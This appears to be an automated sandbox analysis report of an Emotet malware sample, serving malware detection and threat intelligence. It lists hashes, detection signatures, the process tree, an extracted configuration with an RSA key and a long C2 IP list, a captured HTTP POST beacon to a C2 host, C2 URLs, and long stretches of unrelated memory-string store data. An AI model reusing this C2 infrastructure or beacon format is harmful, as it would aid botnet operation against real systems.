
Windows Analysis Report NWMEaRqF7s.exe

Overview

General Information

Sample Name: NWMEaRqF7s.exe
Analysis ID: 445260
MD5: 0ba53dbed762655999bd37a1d8bee9db
SHA1: 4566e7559e5c4287a25796ed622324a6b5b70e63
SHA256: 77ed3ca0af1fec8c76e4f77114090edec76040713e53f6682151b53d79f28c79

Detection

Emotet
Score: 88
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected Emotet
C2 URLs / IPs found in malware configuration
Drops executables to the windows directory (C:\Windows) and starts them
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Antivirus or Machine Learning detection for unpacked file
Connects to several IPs in different countries
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates files inside the system directory
Deletes files inside the Windows folder
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files to the windows directory (C:\Windows)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains strange resources
Potential key logger detected (key state polling based)
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • NWMEaRqF7s.exe (PID: 2944 cmdline: 'C:\Users\user\Desktop\NWMEaRqF7s.exe' MD5: 0BA53DBED762655999BD37A1D8BEE9DB)
    • dot3hc.exe (PID: 5536 cmdline: C:\Windows\SysWOW64\sqlcecompact40\dot3hc.exe MD5: 0BA53DBED762655999BD37A1D8BEE9DB)
  • svchost.exe (PID: 5976 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 5604 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 4752 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 5408 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 2176 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • cleanup

Malware Configuration

Threatname: Emotet

{"RSA Public Key": "MHwwDQYJKoZIhvcNAQEBBQADawAwaAJhANQOcBKvh5xEW7VcJ9totsjdBwuAclxS\nQ0e09fk8V053lktpW3TRrzAW63yt6j1KWnyxMrU3igFXypBoI4lVNmkje4UPtIIS\nfkzjEIvG1v/ZNn1k0J0PfFTxbFFeUEs3AwIDAQAB", "C2 list": ["192.158.216.73:80", "85.214.28.226:8080", "142.44.137.67:443", "162.241.242.173:8080", "85.152.162.105:80", "62.30.7.67:443", "78.24.219.147:8080", "74.120.55.163:80", "169.239.182.217:8080", "216.208.76.186:80", "95.213.236.64:8080", "200.114.213.233:8080", "104.131.44.150:8080", "70.121.172.89:80", "75.139.38.211:80", "185.94.252.104:443", "97.82.79.83:80", "103.86.49.11:8080", "79.98.24.39:8080", "83.169.36.251:8080", "188.219.31.12:80", "74.208.45.104:8080", "137.59.187.107:8080", "174.45.13.118:80", "194.187.133.160:443", "50.81.3.113:80", "201.173.217.124:443", "139.99.158.11:443", "173.62.217.22:443", "139.130.242.43:80", "190.160.53.126:80", "137.119.36.33:80", "209.141.54.221:8080", "24.179.13.119:80", "120.150.60.189:80", "107.5.122.110:80", "121.124.124.40:7080", "203.153.216.189:7080", "157.245.99.39:8080", "85.105.205.77:8080", "173.81.218.65:80", "110.145.77.103:80", "47.144.21.12:443", "95.179.229.244:8080", "187.161.206.24:80", "46.105.131.79:8080", "189.212.199.126:443", "168.235.67.138:7080", "24.137.76.62:80", "85.66.181.138:80", "200.41.121.90:80", "5.39.91.110:7080", "104.236.246.93:8080", "172.91.208.86:80", "99.224.14.125:80", "37.139.21.175:8080", "109.74.5.95:8080", "1.221.254.82:80", "61.19.246.238:443", "5.196.74.210:8080", "67.205.85.243:8080", "79.137.83.50:443", "94.200.114.161:80", "70.180.43.7:80", "190.55.181.54:443", "47.146.117.214:80", "89.205.113.80:80", "37.187.72.193:8080", "84.39.182.7:80", "104.131.11.150:443", "139.162.108.71:8080", "87.106.136.232:8080", "153.232.188.106:80", "37.70.8.161:80", "112.185.64.233:80", "87.106.139.101:8080", "94.23.237.171:443", "24.43.99.75:80", "203.117.253.142:80", "98.109.204.230:80", "93.147.212.206:80", "91.211.88.52:7080", "139.59.60.244:8080", "176.111.60.55:8080", 
"180.92.239.110:8080", "62.75.141.82:80", "174.102.48.180:443"]}

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000001.00000002.347473341.0000000002244000.00000004.00000001.sdmp | JoeSecurity_Emotet | Yara detected Emotet | Joe Security |
00000001.00000002.347079722.00000000005A0000.00000040.00000001.sdmp | JoeSecurity_Emotet | Yara detected Emotet | Joe Security |
00000003.00000002.615027778.00000000022D0000.00000040.00000001.sdmp | JoeSecurity_Emotet | Yara detected Emotet | Joe Security |
00000003.00000002.615086404.00000000022E4000.00000004.00000001.sdmp | JoeSecurity_Emotet | Yara detected Emotet | Joe Security |

Unpacked PEs

Source | Rule | Description | Author | Strings
1.2.NWMEaRqF7s.exe.5a052e.2.raw.unpack | JoeSecurity_Emotet | Yara detected Emotet | Joe Security |
1.2.NWMEaRqF7s.exe.5a23ae.3.raw.unpack | JoeSecurity_Emotet | Yara detected Emotet | Joe Security |
1.2.NWMEaRqF7s.exe.5a23ae.3.unpack | JoeSecurity_Emotet | Yara detected Emotet | Joe Security |
3.2.dot3hc.exe.22d052e.3.unpack | JoeSecurity_Emotet | Yara detected Emotet | Joe Security |
3.2.dot3hc.exe.22d052e.3.raw.unpack | JoeSecurity_Emotet | Yara detected Emotet | Joe Security |

Sigma Overview

No Sigma rule has matched

Jbx Signature Overview


AV Detection:

Antivirus / Scanner detection for submitted sample
Source: NWMEaRqF7s.exe Avira: detected
Found malware configuration
Source: 3.2.dot3hc.exe.22d052e.3.unpack Malware Configuration Extractor: Emotet (RSA public key and C2 list identical to the configuration listed under Malware Configuration above)
Multi AV Scanner detection for submitted file
Source: NWMEaRqF7s.exe Virustotal: Detection: 84%
Source: NWMEaRqF7s.exe Metadefender: Detection: 68%
Source: NWMEaRqF7s.exe ReversingLabs: Detection: 92%
Source: 3.2.dot3hc.exe.22d052e.3.unpack Avira: Label: TR/Crypt.XPACK.Gen2
Source: 1.2.NWMEaRqF7s.exe.5a052e.2.unpack Avira: Label: TR/Crypt.XPACK.Gen2
Source: C:\Windows\SysWOW64\sqlcecompact40\dot3hc.exe Code function: 3_2_02301DEC CryptDecodeObjectEx, 3_2_02301DEC
Source: NWMEaRqF7s.exe Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED
Source: C:\Users\user\Desktop\NWMEaRqF7s.exe Code function: 1_2_00410555 __EH_prolog3, GetFullPathNameA, PathIsUNCA, GetVolumeInformationA, CharUpperA, FindFirstFileA, FindClose, lstrlenA, 1_2_00410555
Source: C:\Users\user\Desktop\NWMEaRqF7s.exe Code function: 1_2_022528FB FindFirstFileW, FindNextFileW, FindClose, 1_2_022528FB
Source: C:\Windows\SysWOW64\sqlcecompact40\dot3hc.exe Code function: 3_2_00410555 __EH_prolog3, GetFullPathNameA, PathIsUNCA, GetVolumeInformationA, CharUpperA, FindFirstFileA, FindClose, lstrlenA, 3_2_00410555
Source: C:\Windows\SysWOW64\sqlcecompact40\dot3hc.exe Code function: 3_2_023028FB FindFirstFileW, FindNextFileW, FindClose, 3_2_023028FB

Networking:

C2 URLs / IPs found in malware configuration (Source: Malware configuration extractor; the full C2 list is the one shown under Malware Configuration above)
Source: unknown Network traffic detected: IP country count 30
Source: global traffic TCP traffic: 192.168.2.6:49730 -> 85.214.28.226:8080
Source: global traffic TCP traffic: 192.168.2.6:49732 -> 162.241.242.173:8080
Source: global traffic TCP traffic: 192.168.2.6:49760 -> 78.24.219.147:8080
Source: Joe Sandbox View IP Address: 94.200.114.161
Source: Joe Sandbox View IP Address: 139.99.158.11
Source: Joe Sandbox View IP Address: 85.214.28.226
Source: Joe Sandbox View ASN Name: ROGERS-COMMUNICATIONSCA
Source: Joe Sandbox View ASN Name: STARHUB-MOBILEStarHubLtdSG
Source: Joe Sandbox View ASN Name: DU-AS1AE
Source: global traffic HTTP traffic detected:
POST /DLgjaT02V4ZRh7a7A/wt8CBtC1NZfAQWkn/ HTTP/1.1
Content-Type: multipart/form-data; boundary=---------------------80lhrKDVYliktvcpjgmL9
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
Host: 142.44.137.67:443
Content-Length: 4612
Connection: Keep-Alive
Cache-Control: no-cache
Source: unknown TCP traffic detected without corresponding DNS query: 192.158.216.73
Source: unknown TCP traffic detected without corresponding DNS query: 85.214.28.226
Source: unknown TCP traffic detected without corresponding DNS query: 142.44.137.67
Source: unknown TCP traffic detected without corresponding DNS query: 162.241.242.173
Source: unknown TCP traffic detected without corresponding DNS query: 85.152.162.105
Source: unknown TCP traffic detected without corresponding DNS query: 62.30.7.67
Source: unknown TCP traffic detected without corresponding DNS query: 78.24.219.147
Source: svchost.exe, 0000000C.00000002.470826359.0000017DE74EC000.00000004.00000001.sdmp String found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotif equals www.facebook.com (Facebook)
Source: svchost.exe, 0000000C.00000002.470826359.0000017DE74EC000.00000004.00000001.sdmp String found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotif equals www.twitter.com (Twitter)
                    Source: svchost.exe, 0000000C.00000002.471604595.0000017DE7D15000.00000004.00000001.sdmpString found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify Music","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"pandora","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","
VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductUnifiedApp;3","ProductId":"9NCBCSZSJRSB","Properties":{"PackageFamilyName":"SpotifyAB.SpotifyMusic_zpdnekdrzrea0","PackageIdentityName":"SpotifyAB.SpotifyMusic","PublisherCertificateName":"CN=453637B3-4E12-4CDF-B0D3-2A3C863BF6EF","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"ceac5d3f-8a4f-40e1-9a67-76d9108c7cb5"},{"IdType":"LegacyWindowsPhoneProductId","Value":"caac1b9d-621b-4f96-b143-e10e1397740a"},{"IdType":"XboxTitleId","Value":"1681279293"}],"IngestionSource":"DCE","IsMicrosoftProduct":false,"PreferredSkuId":"0010","ProductType":"Application","ValidationData":{"PassedValidation":false,"RevisionId":"2021-07-07T08:53:08.3402540Z||.||e614b8f2-4086-47b8-a8db-bfa82598f22f||1152921505693648129||Null||fullrelease","ValidationResultUri":""},"MerchandizingTags":[],"PartD":"","ProductFamily":"Apps","ProductKind":"Application","DisplaySkuAvailabilities":[{"Sku"
                    Source: svchost.exe, 0000000C.00000002.471604595.0000017DE7D15000.00000004.00000001.sdmpString found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify Music","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"pandora","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","
VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductUnifiedApp;3","ProductId":"9NCBCSZSJRSB","Properties":{"PackageFamilyName":"SpotifyAB.SpotifyMusic_zpdnekdrzrea0","PackageIdentityName":"SpotifyAB.SpotifyMusic","PublisherCertificateName":"CN=453637B3-4E12-4CDF-B0D3-2A3C863BF6EF","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"ceac5d3f-8a4f-40e1-9a67-76d9108c7cb5"},{"IdType":"LegacyWindowsPhoneProductId","Value":"caac1b9d-621b-4f96-b143-e10e1397740a"},{"IdType":"XboxTitleId","Value":"1681279293"}],"IngestionSource":"DCE","IsMicrosoftProduct":false,"PreferredSkuId":"0010","ProductType":"Application","ValidationData":{"PassedValidation":false,"RevisionId":"2021-07-07T08:53:08.3402540Z||.||e614b8f2-4086-47b8-a8db-bfa82598f22f||1152921505693648129||Null||fullrelease","ValidationResultUri":""},"MerchandizingTags":[],"PartD":"","ProductFamily":"Apps","ProductKind":"Application","DisplaySkuAvailabilities":[{"Sku"
                    Source: svchost.exe, 0000000C.00000003.449149844.0000017DE7DA0000.00000004.00000001.sdmpString found in binary or memory: is absolutely free to play, you have the ability to unlock optional bonuses via in-app purchases from within the game. You may disable in-app purchases in your device settings.\r\n______________________________\r\n\r\nVisit us: www.g5e.com\r\nWatch us: www.youtube.com/g5enter\r\nFind us: www.facebook.com/HiddenCityGame\r\nFollow us: www.twitter.com/g5games\r\nJoin us: www.instagram.com/hiddencity_\r\nGame FAQs: https://support.g5e.com/hc/en-us/categories/360002985040-Hidden-City-Hidden-Object-Adventure\r\nTerms of Service: http://www.g5e.com/termsofservice\r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplemental_Terms","ProductTitle":"Hidden City: Hidden Object Adventure","SearchTitles":[{"SearchTitleString":"find hidden objects ","SearchTitleType":"SearchHint"},{"SearchTitleString":"junes pearls free ","SearchTitleType":"SearchHint"},{"SearchTitleString":"ispy notes peril","SearchTitleType":"SearchHint"},{"SearchTitleString":"seekers mystery ","SearchTitleType":"SearchHint"},{"SearchTitleString":"detective manor solving","SearchTitleType":"SearchHint"},{"SearchTitleString":"sherlock hotel spot it","SearchTitleType":"SearchHint"},{"SearchTitleString":"puzzle game journey 
","SearchTitleType":"SearchHint"}],"Language":"en","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductGame;1","ProductId":"9NBLGGH6J6VK","Properties":{"PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","PackageIdentityName":"828B5831.HiddenCityMysteryofShadows","PublisherCertificateName":"CN=A4F05332-BE3A-4155-B996-B100171CD4B1","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"Legac
                    Source: unknown | HTTP traffic detected: POST /DLgjaT02V4ZRh7a7A/wt8CBtC1NZfAQWkn/ HTTP/1.1 Content-Type: multipart/form-data; boundary=---------------------80lhrKDVYliktvcpjgmL9 User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: 142.44.137.67:443 Content-Length: 4612 Connection: Keep-Alive Cache-Control: no-cache
                    Source: dot3hc.exe, 00000003.00000002.617441030.00000000029E2000.00000004.00000001.sdmp | String found in binary or memory: http://142.44.137.67:443/DLgjaT02V4ZRh7a7A/wt8CBtC1NZfAQWkn/
                    Source: dot3hc.exe, 00000003.00000002.617441030.00000000029E2000.00000004.00000001.sdmp | String found in binary or memory: http://142.44.137.67:443/DLgjaT02V4ZRh7a7A/wt8CBtC1NZfAQWkn/T
                    Source: dot3hc.exe, 00000003.00000002.617493690.00000000029F9000.00000004.00000001.sdmp | String found in binary or memory: http://162.241.242.173:8080/nPONFQEvQO/m1R1pV6p0j201mdDM/V3kdX/
                    Source: dot3hc.exe, 00000003.00000002.617441030.00000000029E2000.00000004.00000001.sdmp | String found in binary or memory: http://192.158.216.73/bw3A8vOSwPk/MUmkPxxvia/gp9rmo9BY/Aiyozum4do0I2sb158h/TZEWfRpLT/CpHNbkWtxKNiePn
                    Source: dot3hc.exe, 00000003.00000002.617493690.00000000029F9000.00000004.00000001.sdmp | String found in binary or memory: http://78.24.219.147:8080/2VdcJgn3KtqNnFx/FoHxTH03XYaP/
                    Source: dot3hc.exe, 00000003.00000002.617441030.00000000029E2000.00000004.00000001.sdmp | String found in binary or memory: http://78.24.219.147:8080/2VdcJgn3KtqNnFx/FoHxTH03XYaP/t
                    Source: dot3hc.exe, 00000003.00000002.617441030.00000000029E2000.00000004.00000001.sdmp | String found in binary or memory: http://85.152.162.105/jIpQt16P2GWjQ5/wnzZKJ/DKZyC/
                    Source: svchost.exe, 0000000C.00000003.470057078.0000017DE7452000.00000004.00000001.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
                    Source: svchost.exe, 0000000C.00000002.471659904.0000017DE7D75000.00000004.00000001.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRoo
                    Source: svchost.exe, 0000000C.00000003.470057078.0000017DE7452000.00000004.00000001.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
                    Source: svchost.exe, 00000012.00000002.617508051.0000017D2F811000.00000004.00000001.sdmp | String found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
                    Source: svchost.exe, 0000000C.00000003.470057078.0000017DE7452000.00000004.00000001.sdmp | String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
                    Source: svchost.exe, 0000000C.00000003.470057078.0000017DE7452000.00000004.00000001.sdmp | String found in binary or memory: http://ocsp.digicert.com0
                    Source: svchost.exe, 00000012.00000002.617508051.0000017D2F811000.00000004.00000001.sdmp | String found in binary or memory: http://ocsp.digicert.com0:
                    Source: svchost.exe, 00000012.00000002.617508051.0000017D2F811000.00000004.00000001.sdmp | String found in binary or memory: http://ocsp.msocsp.com0
                    Source: svchost.exe, 00000012.00000002.616906100.0000017D2F6D0000.00000002.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
                    Source: svchost.exe, 0000000C.00000003.449149844.0000017DE7DA0000.00000004.00000001.sdmp | String found in binary or memory: http://www.g5e.com/G5_End_User_License_Supplemental_Terms
                    Source: svchost.exe, 0000000C.00000003.449149844.0000017DE7DA0000.00000004.00000001.sdmp | String found in binary or memory: http://www.g5e.com/termsofservice
                    Source: svchost.exe, 0000000C.00000003.457543774.0000017DE7DAB000.00000004.00000001.sdmp | String found in binary or memory: https://corp.roblox.com/contact/
                    Source: svchost.exe, 0000000C.00000003.457543774.0000017DE7DAB000.00000004.00000001.sdmp | String found in binary or memory: https://corp.roblox.com/parents/
                    Source: svchost.exe, 0000000C.00000003.457543774.0000017DE7DAB000.00000004.00000001.sdmp | String found in binary or memory: https://en.help.roblox.com/hc/en-us
                    Source: svchost.exe, 0000000C.00000003.449149844.0000017DE7DA0000.00000004.00000001.sdmp | String found in binary or memory: https://support.g5e.com/hc/en-us/categories/360002985040-Hidden-City-Hidden-Object-Adventure
                    Source: svchost.exe, 0000000C.00000003.457543774.0000017DE7DAB000.00000004.00000001.sdmp | String found in binary or memory: https://www.roblox.com/develop
                    Source: svchost.exe, 0000000C.00000003.457543774.0000017DE7DAB000.00000004.00000001.sdmp | String found in binary or memory: https://www.roblox.com/info/privacy
                    Source: svchost.exe, 0000000C.00000003.450618925.0000017DE7D9E000.00000004.00000001.sdmp | String found in binary or memory: https://www.tiktok.com/legal/report/feedback
                    Source: unknown | Network traffic detected: HTTP traffic on port 49757 -> 443
                    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49731
                    Source: unknown | Network traffic detected: HTTP traffic on port 49731 -> 443
                    Source: C:\Users\user\Desktop\NWMEaRqF7s.exe | Code function: 1_2_0040A094 GetKeyState,GetKeyState,GetKeyState,GetKeyState,SendMessageA
                    Source: C:\Windows\SysWOW64\sqlcecompact40\dot3hc.exe | Code function: 3_2_0040A094 GetKeyState,GetKeyState,GetKeyState,GetKeyState,SendMessageA

                    E-Banking Fraud:

                    Yara detected Emotet
                    Source: Yara match | File source: 1.2.NWMEaRqF7s.exe.5a052e.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 1.2.NWMEaRqF7s.exe.5a23ae.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 1.2.NWMEaRqF7s.exe.5a23ae.3.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 3.2.dot3hc.exe.22d052e.3.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 3.2.dot3hc.exe.22d052e.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 3.2.dot3hc.exe.22d23ae.2.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 3.2.dot3hc.exe.22d23ae.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 1.2.NWMEaRqF7s.exe.5a052e.2.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 00000001.00000002.347473341.0000000002244000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000001.00000002.347079722.00000000005A0000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000003.00000002.615027778.00000000022D0000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000003.00000002.615086404.00000000022E4000.00000004.00000001.sdmp, type: MEMORY
                    Source: C:\Users\user\Desktop\NWMEaRqF7s.exe | File created: C:\Windows\SysWOW64\sqlcecompact40\
                    Source: C:\Users\user\Desktop\NWMEaRqF7s.exe | File deleted: C:\Windows\SysWOW64\sqlcecompact40\dot3hc.exe:Zone.Identifier
                    Source: C:\Users\user\Desktop\NWMEaRqF7s.exe | Code function: 1_2_0042F078
                    Source: C:\Users\user\Desktop\NWMEaRqF7s.exe | Code function: 1_2_00420268
                    Source: C:\Users\user\Desktop\NWMEaRqF7s.exe | Code function: 1_2_0042339B
                    Source: C:\Users\user\Desktop\NWMEaRqF7s.exe | Code function: 1_2_0042C550
                    Source: C:\Users\user\Desktop\NWMEaRqF7s.exe | Code function: 1_2_0042E5F4
                    Source: C:\Users\user\Desktop\NWMEaRqF7s.exe | Code function: 1_2_00428640
                    Source: C:\Users\user\Desktop\NWMEaRqF7s.exe | Code function: 1_2_0042063C
                    Source: C:\Users\user\Desktop\NWMEaRqF7s.exe | Code function: 1_2_0042F73C
                    Source: C:\Users\user\Desktop\NWMEaRqF7s.exe | Code function: 1_2_0041E780
                    Source: C:\Users\user\Desktop\NWMEaRqF7s.exe | Code function: 1_2_0043084D
                    Source: C:\Users\user\Desktop\NWMEaRqF7s.exe | Code function: 1_2_0040B8F6
                    Source: C:\Users\user\Desktop\NWMEaRqF7s.exe | Code function: 1_2_00420A48
                    Source: C:\Users\user\Desktop\NWMEaRqF7s.exe | Code function: 1_2_0042EB36
                    Source: C:\Users\user\Desktop\NWMEaRqF7s.exe | Code function: 1_2_00427C19
                    Source: C:\Users\user\Desktop\NWMEaRqF7s.exe | Code function: 1_2_0041FD95
                    Source: C:\Users\user\Desktop\NWMEaRqF7s.exe | Code function: 1_2_00420E68
                    Source: C:\Users\user\Desktop\NWMEaRqF7s.exe | Code function: 1_2_02252AEA
                    Source: C:\Users\user\Desktop\NWMEaRqF7s.exe | Code function: 1_2_02252C80
                    Source: C:\Windows\SysWOW64\sqlcecompact40\dot3hc.exe | Code function: 3_2_0042F078
